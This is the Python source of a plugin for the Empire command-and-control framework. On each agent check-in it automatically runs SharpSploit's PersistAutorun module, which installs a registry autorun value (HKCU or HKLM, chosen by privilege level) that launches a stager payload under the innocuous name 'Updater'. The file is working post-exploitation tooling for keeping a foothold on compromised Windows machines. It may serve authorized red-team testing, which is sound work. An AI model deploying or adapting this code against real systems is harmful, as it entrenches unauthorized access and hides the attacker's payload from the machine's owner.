from __future__ import print_function

import empire.server.common.helpers as helpers

from empire.server.common.hooks import hooks
from empire.server.common.plugins import Plugin
from empire.server.common.module_models import PydanticModule
from empire.server.database import models
from empire.server.database.base import Session

# this class MUST be named Plugin
class Plugin(Plugin):
    description = "Automatically run PersistAutorun module on checkin."

    def onLoad(self):
        print(helpers.color("[*] Loading autopersistautorun plugin"))
        self.main_menu = None
        self.info = {
            "Name": "autopersistautorun",
            "Author": ["@yok4i"],
            "Description": ("Execute PersistAutorun module as soon as agent check in."),
            "Software": "",
            "Techniques": ["T1547"],
            "Comments": [
                "Installs an autorun value in HKCU or HKLM to execute a payload.",
                "TargetHive: Target hive to install autorun. Specify 'CurrentUser' for HKCU and 'LocalMachine' for HKLM.",
                "If TargetHive is set to Auto, it will depend on agent's integrity level.",
            ]
        },

        self.options = {
            "DotNetVersion": {
                "Description": ".NET version to compile against",
                "Required": True,
                "Value": "Net35",
                "SuggestedValues": [
                    "Net35",
                    "Net40"
                ],
                "Strict": True
            },
            "Name": {
                "Description": "Name for the registry value",
                "Required": True,
                "Value": "Updater"
            },
            "TargetHive": {
                "Description": "Target hive to install autorun",
                "Required": True,
                "Value": "CurrentUser",
                "SuggestedValues": [
                    "Auto",
                    "CurrentUser",
                    "LocalMachine"
                ],
                "Strict": True
            },
            "Value": {
                "Description": "Value to set in the registry",
                "Required": True,
                "Value": "C:\Example\GruntStager.exe"
            },
            "Status": {
                "Description": "<start/stop/status>",
                "Required": True,
                "Value": "start",
                "SuggestedValues": ["start", "stop", "status"],
                "Strict": True,
            },
        }
        self.hook_name = "autopersistautorunplugin"
        self.hook_event = hooks.AFTER_AGENT_STAGE2_HOOK
        self.enabled = False

    def execute(self, command):
        try:
            self.status = self.options["Status"]["Value"]
            results = self.do_autopersistautorun("")
            return results
        except Exception as e:
            print(e)
            self.main_menu.plugin_socketio_message(self.info[0]["Name"], f"[!] {e}")
            return False

    def get_commands(self):
        return self.commands

    def register(self, mainMenu):
        """
        Any modifications to the mainMenu go here - e.g.
        registering functions to be run by user commands
        """
        mainMenu.__class__.do_autopersistautorun = self.do_autopersistautorun
        self.installPath = mainMenu.installPath
        self.main_menu = mainMenu

    def do_autopersistautorun(self, *args):
        """
        Control autopersistautorun plugin
        """
        if self._hook_exist(self.hook_event, self.hook_name):
             self.enabled = True
        else:
             self.enabled = False
        
        if self.status == "status":
            if self.enabled:
                self.main_menu.plugin_socketio_message(
                    self.info[0]["Name"], "[+] autopersistautorun plugin is currently enabled"
                )
            else:
                self.main_menu.plugin_socketio_message(
                    self.info[0]["Name"], "[!] autopersistautorun plugin is currently disabled"
                )

        elif self.status == "stop":
            if self.enabled:
                hooks.unregister_hook(self.hook_name, self.hook_event)
                if not self._hook_exist(self.hook_event, self.hook_name):
                    self.main_menu.plugin_socketio_message(
                        self.info[0]["Name"], f"[*] autopersistautorun plugin turned off"
                    )
                else:
                    self.main_menu.plugin_socketio_message(
                        self.info[0]["Name"], f"[!] could not unregister hook"
                    )
            else:
                self.main_menu.plugin_socketio_message(
                    self.info[0]["Name"], "[!] autopersistautorun plugin is already turned off"
                )

        elif self.status == "start":
            if self.enabled:
                self.main_menu.plugin_socketio_message(
                    self.info[0]["Name"], "[!] autopersistautorun plugin is already turned on"
                )
            else:
                # register hook
                hooks.register_hook(self.hook_event, self.hook_name, self.task_persistence)
                if self._hook_exist(self.hook_event, self.hook_name):
                    self.main_menu.plugin_socketio_message(
                        self.info[0]["Name"], f"[+] autopersistautorun plugin turned on"
                    )
                else:
                    self.main_menu.plugin_socketio_message(
                        self.info[0]["Name"], f"[!] could not register hook"
                    )
    
    def task_persistence(self, agent: models.Agent):
        """
        Create a new task to run PersistAutorun module for the given agent
        """
        module_name = "csharp/SharpSploit.Persistence/PersistAutorun"
        module: PydanticModule = self.main_menu.modules.get_module(module_name)
        if not module:
            self.main_menu.plugin_socketio_message(
                self.info[0]["Name"], f"[!] module name {module_name} not found"
            )
            print(helpers.color(f"[!] module name {module_name} not found"))
            return

        if self.options["TargetHive"]["Value"] != "Auto":
            tgthive = self.options["TargetHive"]["Value"]
        else:
            tgthive = "LocalMachine" if agent.high_integrity == 1 else "CurrentUser"
        # define module options
        options = {
            "Agent": agent.name,
            "DotNetVersion": self.options["DotNetVersion"]["Value"],
            "Name": self.options["Name"]["Value"],
            "TargetHive": tgthive,
            "Value": self.options["Value"]["Value"]
        }
        # get id from admin
        admin = (
            Session()
            .query(models.User)
            .filter(models.User.admin == True and models.User.enabled == True)
            .first()
        )
        if admin:
            admin_id = admin.id
        else:
            admin_id = 1
        result, err = self.main_menu.modules.execute_module(
            module, params=options, user_id=admin_id)
        if err:
            self.main_menu.plugin_socketio_message(
                self.info[0]["Name"], f"[!] {err}"
            )
        else:
            self.main_menu.plugin_socketio_message(
                self.info[0]["Name"], f"[+] Task {result['taskID']}: {result['msg']}"
            )

    def _hook_exist(self, event: str, name: str):
        return name in hooks.hooks.get(event, {}).keys()

    def shutdown(self):
        """
        Kills additional processes that were spawned
        """
        pass

